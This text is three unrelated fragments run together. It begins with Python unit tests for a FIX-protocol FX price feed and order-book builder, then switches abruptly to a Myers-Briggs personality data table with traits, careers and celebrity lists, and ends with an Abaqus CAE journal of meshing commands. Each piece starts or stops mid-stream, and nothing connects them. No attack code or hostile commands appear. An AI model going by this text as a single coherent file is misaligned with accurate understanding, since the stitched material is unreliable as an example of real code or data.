'B0': {'entry_type': 0, 'price': 1.35, 'size': 2100000.0, 'provider': '1', 'time': 1616965217182000},
'S0': {'entry_type': 1, 'price': 1.35, 'size': 1300000.0, 'provider': '1', 'time': 1616965217182000},
'B1': {'entry_type': 0, 'price': 1.35, 'size': 2200000.0, 'provider': '0', 'time': 1616965217182000},
'S1': {'entry_type': 1, 'price': 1.35, 'size': 1400000.0, 'provider': '0', 'time': 1616965217182000}
}
msg = fix.Message('8=FIX.4.4|9=231|35=W|34=5|49=XC461|52=20210328-21:00:17.185|56=Q000|55=USD/CAD|262=1|268=4|269=0|270=1.34|271=2000000|299=0|106=1|269=1|270=1.34|271=1500000|299=0|106=1|269=0|270=1.34|271=2100000|299=1|106=0|269=1|270=1.34|271=1200000|299=1|106=0|10=165|'.replace('|', '\x01'), self.data_dictionary)
self.pricefeed.on_market_data_snapshot(msg, None)
item = self.pricefeed.queue.get()
self.assertEqual((1616965217185000, 'USDCAD', [
['0', 2000000.0, 1500000.0, 1.34, 1.34, '1', '1'],
['1', 2100000.0, 1200000.0, 1.34, 1.34, '0', '0'],
], True), item)
self.bookbuilder.process_item(item)
time, symbol, book = self.bookbuilder.outbound_queue.get()
self.assertEqual(1616965217185000, time)
self.assertEqual('USDCAD', symbol)
self.assertEqual(1616965217185000, book['time'])
# check bids
self.assertEqual(1616965217185000, book['bid_time0'])
self.assertEqual(1.34, book['bid_px0'])
self.assertEqual(2100000, book['bid_size0'])
self.assertEqual(b'0', book['bid_provider0'][0])
self.assertEqual(1616965217185000, book['bid_time1'])
self.assertEqual(1.34, book['bid_px1'])
self.assertEqual(2000000, book['bid_size1'])
self.assertEqual(b'1', book['bid_provider1'][0])
self.assertEqual(0, book['bid_time2'])
self.assertEqual(0, book['bid_px2'])
self.assertEqual(0, book['bid_size2'])
self.assertEqual(b'', book['bid_provider2'][0])
# check asks
self.assertEqual(1616965217185000, book['ask_time0'])
self.assertEqual(1.34, book['ask_px0'])
self.assertEqual(1500000, book['ask_size0'])
self.assertEqual(b'1', book['ask_provider0'][0])
self.assertEqual(1616965217185000, book['ask_time1'])
self.assertEqual(1.34, book['ask_px1'])
self.assertEqual(1200000, book['ask_size1'])
self.assertEqual(b'0', book['ask_provider1'][0])
self.assertEqual(0, book['ask_time2'])
self.assertEqual(0, book['ask_px2'])
self.assertEqual(0, book['ask_size2'])
self.assertEqual(b'', book['ask_provider2'][0])
np.savetxt('/tmp/book_usdcad_0018.csv', book, delimiter=',', fmt='%s')
# USD/CAD
# bids | asks
# [1] 2100000 @ 1.34 lp1*| [0] 1500000 @ 1.34 lp0*
# [0] 2000000 @ 1.34 lp0*| [1] 1200000 @ 1.34 lp1*
def test_snapshot_change_all_providers(self):
self.bookbuilder.quotes['USDCAD'] = {
'B0': {'entry_type': 0, 'price': 1.34, 'size': 2000000.0, 'provider': '1', 'time': 1616965217185000},
'S0': {'entry_type': 1, 'price': 1.34, 'size': 1500000.0, 'provider': '1', 'time': 1616965217185000},
'B1': {'entry_type': 0, 'price': 1.34, 'size': 2100000.0, 'provider': '0', 'time': 1616965217185000},
'S1': {'entry_type': 1, 'price': 1.34, 'size': 1200000.0, 'provider': '0', 'time': 1616965217185000}
}
msg = fix.Message('8=FIX.4.4|9=231|35=W|34=5|49=XC461|52=20210328-21:00:17.186|56=Q000|55=USD/CAD|262=1|268=4|269=0|270=1.34|271=2000000|299=0|106=0|269=1|270=1.34|271=1500000|299=0|106=0|269=0|270=1.34|271=2100000|299=1|106=1|269=1|270=1.34|271=1200000|299=1|106=1|10=166|'.replace('|', '\x01'), self.data_dictionary)
self.pricefeed.on_market_data_snapshot(msg, None)
item = self.pricefeed.queue.get()
self.assertEqual((1616965217186000, 'USDCAD', [
['0', 2000000.0, 1500000.0, 1.34, 1.34, '0', '0'],
['1', 2100000.0, 1200000.0, 1.34, 1.34, '1', '1'],
], True), item)
self.bookbuilder.process_item(item)
time, symbol, book = self.bookbuilder.outbound_queue.get()
self.assertEqual(1616965217186000, time)
self.assertEqual('USDCAD', symbol)
self.assertEqual(1616965217186000, book['time'])
# check bids
self.assertEqual(1616965217186000, book['bid_time0'])
self.assertEqual(1.34, book['bid_px0'])
self.assertEqual(2100000, book['bid_size0'])
self.assertEqual(b'1', book['bid_provider0'][0])
self.assertEqual(1616965217186000, book['bid_time1'])
self.assertEqual(1.34, book['bid_px1'])
self.assertEqual(2000000, book['bid_size1'])
self.assertEqual(b'0', book['bid_provider1'][0])
self.assertEqual(0, book['bid_time2'])
self.assertEqual(0, book['bid_px2'])
self.assertEqual(0, book['bid_size2'])
self.assertEqual(b'', book['bid_provider2'][0])
# check asks
self.assertEqual(1616965217186000, book['ask_time0'])
self.assertEqual(1.34, book['ask_px0'])
self.assertEqual(1500000, book['ask_size0'])
self.assertEqual(b'0', book['ask_provider0'][0])
self.assertEqual(1616965217186000, book['ask_time1'])
self.assertEqual(1.34, book['ask_px1'])
self.assertEqual(1200000, book['ask_size1'])
self.assertEqual(b'1', book['ask_provider1'][0])
self.assertEqual(0, book['ask_time2'])
self.assertEqual(0, book['ask_px2'])
self.assertEqual(0, book['ask_size2'])
self.assertEqual(b'', book['ask_provider2'][0])
np.savetxt('/tmp/book_usdcad_0019.csv', book, delimiter=',', fmt='%s')
## snapshot updates to 1 layer
# USD/CAD
# bids | asks
# [1] 2100000 @ 1.34 lp1 | [1] 1200000 @ 1.34 lp1
def test_snapshot_reduce_to_one_level(self):
self.bookbuilder.quotes['USDCAD'] = {
'B0': {'entry_type': 0, 'price': 1.34, 'size': 2000000.0, 'provider': '0', 'time': 1616965217186000},
'S0': {'entry_type': 1, 'price': 1.34, 'size': 1500000.0, 'provider': '0', 'time': 1616965217186000},
'B1': {'entry_type': 0, 'price': 1.34, 'size': 2100000.0, 'provider': '1', 'time': 1616965217186000},
'S1': {'entry_type': 1, 'price': 1.34, 'size': 1200000.0, 'provider': '1', 'time': 1616965217186000}
}
msg = fix.Message('8=FIX.4.4|9=153|35=W|34=5|49=XC461|52=20210328-21:00:17.187|56=Q000|55=USD/CAD|262=1|268=2|269=0|270=1.34|271=2100000|299=1|106=1|269=1|270=1.34|271=1200000|299=1|106=1|10=201|'.replace('|', '\x01'), self.data_dictionary)
self.pricefeed.on_market_data_snapshot(msg, None)
item = self.pricefeed.queue.get()
self.assertEqual((1616965217187000, 'USDCAD', [
['1', 2100000.0, 1200000.0, 1.34, 1.34, '1', '1'],
], True), item)
self.bookbuilder.process_item(item)
time, symbol, book = self.bookbuilder.outbound_queue.get()
self.assertEqual(1616965217187000, time)
self.assertEqual('USDCAD', symbol)
self.assertEqual(1616965217187000, book['time'])
# check bids
self.assertEqual(1616965217186000, book['bid_time0'])
self.assertEqual(1.34, book['bid_px0'])
self.assertEqual(2100000, book['bid_size0'])
self.assertEqual(b'1', book['bid_provider0'][0])
self.assertEqual(0, book['bid_time1'])
self.assertEqual(0, book['bid_px1'])
self.assertEqual(0, book['bid_size1'])
self.assertEqual(b'', book['bid_provider1'][0])
# check asks
self.assertEqual(1616965217186000, book['ask_time0'])
self.assertEqual(1.34, book['ask_px0'])
self.assertEqual(1200000, book['ask_size0'])
self.assertEqual(b'1', book['ask_provider0'][0])
self.assertEqual(0, book['ask_time1'])
self.assertEqual(0, book['ask_px1'])
self.assertEqual(0, book['ask_size1'])
self.assertEqual(b'', book['ask_provider1'][0])
np.savetxt('/tmp/book_usdcad_0020.csv', book, delimiter=',', fmt='%s')
# 8.) logout
def test_logout(self):
msg = fix.Message('8=FIX.4.4|9=55|35=5|34=2820|49=Q000|52=20210328-06:43:54.543|56=XC461|10=145|'.replace('|', '\x01'), self.data_dictionary)
# TODO: clear bookstate
# 9.) logon
def test_logon2(self):
msg = fix.Message('8=FIX.4.4|9=106|35=A|34=1|49=Q000|52=20210328-21:01:17.187|56=XC461|553=primexm_TradeFeedr_q|554=******|98=0|108=30|141=Y|10=41|'.replace('|', '\x01'), self.data_dictionary)
# nothing to do here (callback for offline?)
# 10.) v x 2
def test_subscribe2(self):
sub1 = fix.Message('8=FIX.4.4|9=112|35=V|34=2|49=Q000|52=20210328-21:02:00.516|56=XC461|262=0|263=1|264=16|265=1|146=1|55=EUR/USD|267=2|269=0|269=1|10=119|'.replace('|', '\x01'), self.data_dictionary)
sub2 = fix.Message('8=FIX.4.4|9=112|35=V|34=3|49=Q000|52=20210328-21:02:00.516|56=XC461|262=1|263=1|264=16|265=1|146=1|55=USD/CAD|267=2|269=0|269=1|10=85|'.replace('|', '\x01'), self.data_dictionary)
# nothing to do here (callback for offline?)
## mass quote, add id 0 (should be the only prices in book)
# USD/CAD
# bids | asks
# [0] 1000000 @ 1.33 lp0*| [0] 1100000 @ 1.35 lp0*
def test_mass_quote_freshly_cleared_book(self):
msg = fix.Message('8=FIX.4.4|9=124|35=i|34=6|49=XC461|52=20210328-21:02:17.157|56=Q000|296=1|302=1|295=1|299=0|106=0|134=1000000|135=1100000|188=1.33|190=1.35|10=33|'.replace('|', '\x01'), self.data_dictionary)
self.pricefeed.active_subscriptions['1'] = 'USDCAD'
self.pricefeed.on_mass_quote(msg, None)
item = self.pricefeed.queue.get()
self.assertEqual((1616965337157000, 'USDCAD', [
['0', 1000000.0, 1100000.0, 1.33, 1.35, '0', '0'],
], False), item)
self.bookbuilder.process_item(item)
time, symbol, book = self.bookbuilder.outbound_queue.get()
self.assertEqual(1616965337157000, time)
self.assertEqual('USDCAD', symbol)
self.assertEqual(1616965337157000, book['time'])
# check bids
self.assertEqual(1616965337157000, book['bid_time0'])
self.assertEqual(1.33, book['bid_px0'])
self.assertEqual(1000000, book['bid_size0'])
self.assertEqual(b'0', book['bid_provider0'][0])
self.assertEqual(0, book['bid_time1'])
self.assertEqual(0, book['bid_px1'])
self.assertEqual(0, book['bid_size1'])
self.assertEqual(b'', book['bid_provider1'][0])
# check asks
self.assertEqual(1616965337157000, book['ask_time0'])
self.assertEqual(1.35, book['ask_px0'])
self.assertEqual(1100000, book['ask_size0'])
self.assertEqual(b'0', book['ask_provider0'][0])
self.assertEqual(0, book['ask_time1'])
self.assertEqual(0, book['ask_px1'])
self.assertEqual(0, book['ask_size1'])
self.assertEqual(b'', book['ask_provider1'][0])
np.savetxt('/tmp/book_usdcad_0021.csv', book, delimiter=',', fmt='%s')
## snapshot, two levels, should update both entries
# EUR/USD
# bids | asks
# [1] 1000000*@ 2.45*lp0*| [0] 1000000*@ 2.48*lp1*
# [0] 2000000*@ 2.44*lp1*| [1] 2000000*@ 2.49*lp0*
def test_snapshot_freshly_cleared_book(self):
msg = fix.Message('8=FIX.4.4|9=231|35=W|34=4|49=XC461|52=20210328-21:02:17.158|56=Q000|55=EUR/USD|262=0|268=4|269=0|270=2.44|271=2000000|299=0|106=1|269=1|270=2.48|271=1000000|299=0|106=1|269=0|270=2.45|271=1000000|299=1|106=0|269=1|270=2.49|271=2000000|299=1|106=0|10=211|'.replace('|', '\x01'), self.data_dictionary)
self.pricefeed.on_market_data_snapshot(msg, None)
item | |
Vivid Recall Of Past Experiences In Order To Predict The Outcome Of Future Choices And Events.",
"Isfjs Place A Great Emphasis On Personal Considerations. Extraverted Feelers Are Focused On Developing Social Harmony And Connection. This Is Accomplished Through Behaviors That Are Viewed As Socially Appropriate Or Beneficial, Such As Being Polite, Kind, Considerate, And Helpful.",
"Isfjs Try To Fill The Wants And Needs Of Other People, Sometimes Even Sacrificing Their Own Desires In Order To Ensure That Other People Are Happy.",
"Isfjs Are Planners And Tend To Be Very Well-Organized.",
"This Function Tends To Become Stronger As People Grow Older And Involves Utilizing Logic In Order To Understand How The World Works.",
"As Isfjs Take In New Information And Experiences, They Look For Connections And Commonalities In Order To Find Patterns.",
"Rather Than Simply Trying To Understand A Small Part Of Something, They Want To See How Things Fit Together And How It Functions As A Whole.",
"While Isfjs Tend To Be Focused On The Present And On Concrete Facts, This Largely Unconscious Function Can Help Balance Personality By Helping Focus On Possibilities.",
"Taking In Facts And Then Explore The What-Ifs Can Lead To New Insights About Problems.",
"Istjs Are Planners; They Like To Carefully Plan Things Out Well In Advance. They Enjoy An Orderly Life. They Like Things To Be Well-Organized And Pay A Great Deal Of Attention To Detail. When Things Are In Disarray, People With This Personality Type May Find Themselves Unable To Rest Until They Have Set Everything Straight And The Work Has Been Completed.",
"Istjs Are Both Responsible And Realistic. They Take A Logical Approach To Achieving Goals And Completing Projects And Are Able To Work At A Steady Pace Toward Accomplishing These Tasks. They Are Able To Ignore Distractions In Order To Focus On The Task At Hand And Are Often Described As Dependable And Trustworthy.",
"Istjs Also Place A Great Deal Of Emphasis On Traditions And Laws. They Prefer To Follow Rules And Procedures That Have Previously Been Established. In Some Cases, Istjs Can Seem Rigid And Unyielding In Their Desire To Maintain Structure.",
"Introverted Sensors Are Focused On The Present Moment, Taking In An Abundance Of Information About Their Surroundings.",
"They Also Have Vivid Memories Of The Past And Rely On The Memories Of These Experiences To Form Expectations For The Future.",
"Istjs Are Logical And Efficient. They Enjoy Looking For Rational Explanations For Events.",
"They Prefer To Focus On The Details Rather Than Thinking About Abstract Information.",
"Being Efficient And Productive Is Important For People With This Personality Type. They Appreciate Knowledge That Has Immediate, Practical Applications.",
"Istjs Make Decisions Based On Logic And Objective Data Rather Than Personal Feelings.",
"As They Make Judgments, Istjs Often Make Personal Interpretations Based On Their Internal Set Of Values.",
"This Is Often Describedan Instinct Or Gut Feeling About A Situation. Istj Might Make A Decision Based On Logic, Only To Have This Feeling Kick In Telling Them To Trust Their Feelings Rather Than Just The Facts.",
"This Aspect Of Personality Enjoys New Ideas And Experiences.",
"This Is The Weakest Part Of The Istjs Personality, But Developing This Function Can Sometimes Lead To A More Balanced Personality."],
"Strengths": ["Reliable", "Practical", "Sensitive", "Eye For Detail"],
"Weaknesses": ["Dislikes Abstract Concepts", "Avoids Confrontation",
"Dislikes Change", "Neglects Own Needs"],
"KnownCelbrities": ["Mother Teresa, Nun And Humanitarian",
"<NAME>, Author", "<NAME>, Figure Skater",
"<NAME>, U.S. Army General",
"Dr. <NAME>, <NAME> Series By <NAME>"],
"Careers": ["Social Worker", "Counselor", "Nurse", "Paralegal", "Bookkeeper",
"Child Care Provider", "Office Manager", "Administrator", "Teacher",
"Banker", "Accountant"], "ID": "ISFJ"},
"ESTJ": {"Type": ["Extroversion", "Sensing", "Thinking", "Judging"], "Name": "Executive",
"AltName": "The Director", "Class": "fas fa-user-tie", "BGColor": "#f7991c",
"FTColor": "wheat",
"Description": "Excellent administrators, unsurpassed at managing things or people.",
"Dominant": "Extraverted Thinking", "Auxiliary": "Introverted Sensing",
"Tertiary": "Extraverted Intuition", "Inferior": "Introverted Feeling",
"KeyCharacteristics": [
"Individuals With This Personality Type Tend To Place A High Value On Tradition, Rules, And Security. Maintaining The Status Quo Is Important To Estjs And They Often Become Involved In Civics, Government And Community Organizations.",
"Because Of Their Orthodox Approach To Life, They Can Sometimes Be Seen As Rigid, Stubborn, And Unyielding. Their Take-Charge Attitude Makes It Easy For Estjs To Assume Leadership Positions.",
"Their Self-Confidence And Strong Convictions Help Them Excel At Putting Plans Into Action, But They Can At Times Appear Critical And Overly Aggressive, Particular When Other People Fail To Live Up To Their High Standards.",
"People Often Describe Estjs As Predictable, Stable, Committed, And Practical. They Tend To Be Very Frank And Honest When It Comes To Sharing Their Opinions, Which Can Sometimes Be Seen As Harsh Or Overly Critical.",
"Estjs Rely On Objective Information And Logic To Make Decisions4\\Ufeff Rather Than Personal Feelings. They Are Skilled At Making Objective, Impersonal Decisions. Rather Than Focusing On Their Own Subjective Feelings When They Are Making Judgments, They Consider Facts And Logic In Order To Make Rational Choices.",
"People With Estj Personality Types Tend To Be Very Practical. They Enjoy Learning About Things That They Can See An Immediate, Real-World Use For But Tend To Lose Interest In Things That Are Abstract Or Theoretical. Estjs Enjoy Concrete Facts4\\Ufeff As Opposed To Abstract Information.",
"They Are Good At Making Fast And Decisive Choices, But They May Often Rush To Judgment Before Considering All The Information About A Situation. One The Positive Side, This Trait Makes Them Good Leaders, But It Can Sometimes Lead Them To Being Viewed As Harsh Or Abrasive.",
"They Are Good At Remembering Things With A Great Deal Of Detail. Their Memories Of Past Events Can Be Quite Vivid And They Often Utilize Their Recollections Of Past Experiences To Make Connections With Present Events.",
"Because Their Sensing Function Is Focused Inwardly, They Tend To Be Less Concerned With Novelty And More Focused On Familiarity. They Enjoy Having Habits And Routines That They Can Depend Upon. While This Gives Them Stability And Predictability, It Can Also Make Them Stubborn And Unyielding At Times.",
"This Aspect Of Personality Seeks Out Novel Ideas And Possibilities. It Compels People With This Personality Type To Explore Their Creativity.",
"As They Process New Ideas And Information, They May Explore The Possible Meanings In Order To Spot New Connections Or Patterns. This Allows Them To Look At Incoming Information And Recognize That There May Be More Than One Interpretation Or Possible Outcome.",
"When This Function Is Used, It May Lead Estjs To Make Decisions Based More On Feelings Than On Logic. These Are Often Internal Valuations That Lead To Gut Feelings About Some Situations. While This Function Is Not Used As Often, In Some Cases A Person Might Allow Their Subjective Feelings To Override Their Objective Interpretation Of A Situation.",
"Estjs Tend To Give Much Thought To Their Own Emotions, So This Function Often Operates On A Largely Unconscious Basis."],
"Strengths": ["Practical And Realistic", "Dependable", "Self-Confident",
"Hard-Working", "Traditional", "Strong Leadership Skills"],
"Weaknesses": ["Insensitive", "Inflexible", "Not Good At Expressing Feelings",
"Argumentative", "Bossy"],
"KnownCelbrities": ["<NAME>, U.S. President",
"<NAME>, Television Personality", "<NAME>, Evangelist",
"<NAME>, Actor", "<NAME>, Character From Star Wars"],
"Careers": ["Police Officer", "Military", "Judge", "Teacher", "School Administrator",
"Business Manager", "Accountant", "Banker"], "ID": "ESTJ"},
"ESFJ": {"Type": ["Extroversion", "Sensing", "Feeling", "Judging"], "Name": "Consul",
"AltName": "The Caregiver", "Class": "fas fa-hands-helping", "BGColor": "#f0574b",
"FTColor": "wheat",
"Description": "Extraordinarily caring, social and popular people, always eager to help.",
"Dominant": "Extraverted Feeling", "Auxiliary": "Introverted Sensing",
"Tertiary": "Extraverted Intuition", "Inferior": "Introverted Thinking",
"KeyCharacteristics": [
"In Addition To Deriving Pleasure From Helping Others, Esfjs Also \\U200Bhave A Need For Approval. They Expect Their Kind And Giving Ways To Be Noticed And Appreciated By Others. They Are Sensitive To The Needs And Feelings Of Others And Are Good At Responding And Providing The Care That People Need. They Want To Be Liked By Others And | |
section import *
from assembly import *
from step import *
from interaction import *
from load import *
from mesh import *
from job import *
from sketch import *
from visualization import *
from connectorBehavior import *
mdb.models['Model-1'].parts['Part-2'].setMeshControls(algorithm=ADVANCING_FRONT
, regions=mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask((
'[#10 ]', ), ), technique=SWEEP)
mdb.models['Model-1'].parts['Part-2'].setMeshControls(algorithm=ADVANCING_FRONT
, regions=mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask((
'[#1000 ]', ), ), technique=SWEEP)
mdb.models['Model-1'].parts['Part-2'].setMeshControls(algorithm=ADVANCING_FRONT
, regions=mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask((
'[#400 ]', ), ), technique=SWEEP)
mdb.models['Model-1'].parts['Part-2'].setMeshControls(algorithm=ADVANCING_FRONT
, regions=mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask((
'[#800 ]', ), ), technique=SWEEP)
mdb.models['Model-1'].parts['Part-2'].setMeshControls(algorithm=ADVANCING_FRONT
, regions=mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask((
'[#4 ]', ), ), technique=SWEEP)
mdb.models['Model-1'].parts['Part-2'].setMeshControls(algorithm=ADVANCING_FRONT
, regions=mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask((
'[#200 ]', ), ), technique=SWEEP)
mdb.models['Model-1'].parts['Part-2'].setMeshControls(algorithm=ADVANCING_FRONT
, elemShape=HEX, regions=
mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask(('[#1 ]',
), ), technique=SWEEP)
mdb.models['Model-1'].parts['Part-2'].setMeshControls(algorithm=ADVANCING_FRONT
, elemShape=HEX, regions=
mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask((
'[#8000 ]', ), ), technique=SWEEP)
mdb.models['Model-1'].parts['Part-2'].setMeshControls(algorithm=ADVANCING_FRONT
, regions=mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask((
'[#2000 ]', ), ), technique=SWEEP)
mdb.models['Model-1'].parts['Part-2'].setMeshControls(algorithm=ADVANCING_FRONT
, regions=mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask((
'[#100 ]', ), ), technique=SWEEP)
mdb.models['Model-1'].parts['Part-2'].setMeshControls(algorithm=ADVANCING_FRONT
, regions=mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask((
'[#2 ]', ), ), technique=SWEEP)
mdb.models['Model-1'].parts['Part-2'].setMeshControls(algorithm=ADVANCING_FRONT
, regions=mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask((
'[#4000 ]', ), ), technique=SWEEP)
mdb.models['Model-1'].parts['Part-2'].PartitionCellBySweepEdge(cells=
mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask(('[#100 ]',
), ), edges=(mdb.models['Model-1'].parts['Part-2'].edges[16], ), sweepPath=
mdb.models['Model-1'].parts['Part-2'].edges[68])
mdb.models['Model-1'].parts['Part-2'].PartitionCellBySweepEdge(cells=
mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask(('[#80 ]',
), ), edges=(mdb.models['Model-1'].parts['Part-2'].edges[20], ), sweepPath=
mdb.models['Model-1'].parts['Part-2'].edges[72])
mdb.models['Model-1'].parts['Part-2'].setMeshControls(algorithm=ADVANCING_FRONT
, regions=mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask((
'[#402 ]', ), ), technique=SWEEP)
mdb.models['Model-1'].parts['Part-2'].setMeshControls(algorithm=ADVANCING_FRONT
, regions=mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask((
'[#3a1 ]', ), ), technique=SWEEP)
# Save by banerjee on Tue Oct 18 15:54:16 2011
from part import *
from material import *
from section import *
from assembly import *
from step import *
from interaction import *
from load import *
from mesh import *
from job import *
from sketch import *
from visualization import *
from connectorBehavior import *
mdb.models['Model-1'].parts['Part-2'].generateMesh()
mdb.models['Model-1'].parts['Part-2'].deleteMesh(regions=
mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask((
'[#22010 ]', ), ))
mdb.models['Model-1'].parts['Part-2'].seedEdgeByNumber(edges=
mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#40000000 #80 #0 #20000 ]', ), ), number=15)
mdb.models['Model-1'].parts['Part-2'].seedEdgeBySize(edges=
mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#40000000 #80 #0 #20000 ]', ), ), size=0.006)
mdb.models['Model-1'].parts['Part-2'].deleteMesh(regions=
mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask(('[#800 ]',
), ))
mdb.models['Model-1'].parts['Part-2'].seedEdgeBySize(edges=
mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#44100000 #80 #0 #60800 ]', ), ), size=0.006)
mdb.models['Model-1'].parts['Part-2'].seedEdgeBySize(edges=
mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#44100000 #80 #0 #60800 ]', ), ), size=0.005)
mdb.models['Model-1'].parts['Part-2'].seedEdgeByBias(biasMethod=DOUBLE,
endEdges=mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#44100000 #80 #0 #60800 ]', ), ), maxSize=0.006, minSize=0.005)
mdb.models['Model-1'].parts['Part-2'].seedEdgeByBias(biasMethod=SINGLE,
end1Edges=mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#44100000 #80 #0 #40800 ]', ), ), end2Edges=
mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#0:3 #20000 ]', ), ), maxSize=0.006, minSize=0.005)
mdb.models['Model-1'].parts['Part-2'].seedEdgeByBias(biasMethod=SINGLE,
end1Edges=mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#44100000 #80 #0 #40800 ]', ), ), end2Edges=
mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#0:3 #20000 ]', ), ), maxSize=0.006, minSize=0.004)
mdb.models['Model-1'].parts['Part-2'].seedEdgeByNumber(edges=
mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#40100000 ]', ), ), number=15)
mdb.models['Model-1'].parts['Part-2'].seedEdgeByNumber(edges=
mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#40100000 ]', ), ), number=14)
mdb.models['Model-1'].parts['Part-2'].seedEdgeByNumber(edges=
mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#40100000 ]', ), ), number=18)
mdb.models['Model-1'].parts['Part-2'].seedEdgeByNumber(edges=
mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#40100000 ]', ), ), number=20)
mdb.models['Model-1'].parts['Part-2'].seedEdgeByNumber(edges=
mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#40100000 ]', ), ), number=22)
mdb.models['Model-1'].parts['Part-2'].seedEdgeByNumber(edges=
mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#40100000 ]', ), ), number=24)
mdb.models['Model-1'].parts['Part-2'].seedEdgeByNumber(edges=
mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#40100000 ]', ), ), number=27)
mdb.models['Model-1'].parts['Part-2'].seedEdgeByBias(biasMethod=DOUBLE,
endEdges=mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#40100000 ]', ), ), number=27, ratio=5.0)
mdb.models['Model-1'].parts['Part-2'].seedEdgeByBias(biasMethod=DOUBLE,
endEdges=mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#40100000 ]', ), ), number=24, ratio=5.0)
mdb.models['Model-1'].parts['Part-2'].seedEdgeByBias(biasMethod=DOUBLE,
endEdges=mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#40100000 ]', ), ), number=21, ratio=5.0)
mdb.models['Model-1'].parts['Part-2'].seedEdgeByBias(biasMethod=DOUBLE,
endEdges=mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#40100000 ]', ), ), number=19, ratio=5.0)
mdb.models['Model-1'].parts['Part-2'].seedEdgeByBias(biasMethod=DOUBLE,
endEdges=mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#40100000 ]', ), ), number=17, ratio=5.0)
mdb.models['Model-1'].parts['Part-2'].seedEdgeByBias(biasMethod=DOUBLE,
endEdges=mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#40100000 ]', ), ), number=17, ratio=3.0)
mdb.models['Model-1'].parts['Part-2'].seedEdgeByBias(biasMethod=DOUBLE,
endEdges=mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#40100000 ]', ), ), number=18, ratio=3.0)
mdb.models['Model-1'].parts['Part-2'].seedEdgeByBias(biasMethod=DOUBLE,
endEdges=mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#40100000 ]', ), ), number=18, ratio=2.0)
mdb.models['Model-1'].parts['Part-2'].seedEdgeByBias(biasMethod=DOUBLE,
endEdges=mdb.models['Model-1'].parts['Part-2'].edges.getSequenceFromMask((
'[#40100000 ]', ), ), number=18, ratio=3.0)
mdb.models['Model-1'].parts['Part-2'].generateMesh()
mdb.models['Model-1'].parts['Part-2'].deleteMesh(regions=
mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask((
'[#3fc5a ]', ), ))
mdb.models['Model-1'].parts['Part-2'].PartitionCellByExtrudeEdge(cells=
mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask(('[#4 ]',
), ), edges=(mdb.models['Model-1'].parts['Part-2'].edges[19], ), line=
mdb.models['Model-1'].parts['Part-2'].edges[95], sense=REVERSE)
mdb.models['Model-1'].parts['Part-2'].PartitionCellByExtrudeEdge(cells=
mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask((
'[#1000 ]', ), ), edges=(mdb.models['Model-1'].parts['Part-2'].edges[0], ),
line=mdb.models['Model-1'].parts['Part-2'].edges[101], sense=REVERSE)
mdb.models['Model-1'].parts['Part-2'].PartitionCellByExtrudeEdge(cells=
mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask((
'[#8040 ]', ), ), edges=(mdb.models['Model-1'].parts['Part-2'].edges[13], )
, line=mdb.models['Model-1'].parts['Part-2'].edges[111], sense=FORWARD)
# Save by banerjee on Tue Oct 18 16:12:24 2011
from part import *
from material import *
from section import *
from assembly import *
from step import *
from interaction import *
from load import *
from mesh import *
from job import *
from sketch import *
from visualization import *
from connectorBehavior import *
mdb.models['Model-1'].parts['Part-2'].setMeshControls(algorithm=ADVANCING_FRONT
, regions=mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask((
'[#2814d ]', ), ), technique=SWEEP)
mdb.models['Model-1'].parts['Part-2'].setMeshControls(algorithm=ADVANCING_FRONT
, regions=mdb.models['Model-1'].parts['Part-2'].cells.getSequenceFromMask((
'[#2 ]', ), ), technique=SWEEP)
mdb.models['Model-1'].parts['Part-2'].generateMesh()
# Save by banerjee on Tue Oct 18 16:19:19 2011
from part import *
from material import *
from section import *
from assembly import *
from step import *
from interaction import *
from load import *
from mesh import *
from job import *
from sketch import *
from visualization import *
from connectorBehavior import *
